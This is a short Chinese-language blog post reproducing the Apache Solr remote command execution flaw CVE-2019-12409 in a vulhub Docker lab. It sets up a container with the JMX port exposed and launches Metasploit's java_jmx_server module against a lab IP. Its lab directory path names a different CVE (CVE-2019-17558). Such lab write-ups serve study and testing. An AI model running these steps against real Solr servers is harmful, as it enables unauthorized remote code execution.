Apache Solr 远程命令执行漏洞(CVE-2019-12409)

Apache Solr 远程命令执行漏洞(CVE-2019-12409)

  • 前言
  • 环境搭建
  • 漏洞复现
  • 参考文章

前言

影响Apache Solr 8.1.1到8.2.0版本

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2019-17558/

修改配置
docker-compose.yml

version: '2'
services:
 solr:
   command: solr-demo
   image: vulhub/solr:8.2.0
   ports:
    - "8983:8983"
    - "18983:18983"

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述

漏洞复现

进入docker容器查看配置(a0为docker ps中的容器id)

docker exec -it a0 /bin/bash
cd bin
cat solr.in.sh.orig

Apache Solr 远程命令执行漏洞(CVE-2019-12409)_第1张图片
在这里插入图片描述
存在ENABLE_REMOTE_JMX_OPTS="true"
配置msf

msfconsole
use exploit/multi/misc/java_jmx_server
set rhosts 192.168.164.162
set rport 18983
run

Apache Solr 远程命令执行漏洞(CVE-2019-12409)_第2张图片

参考文章

https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

你可能感兴趣的:(漏洞复现)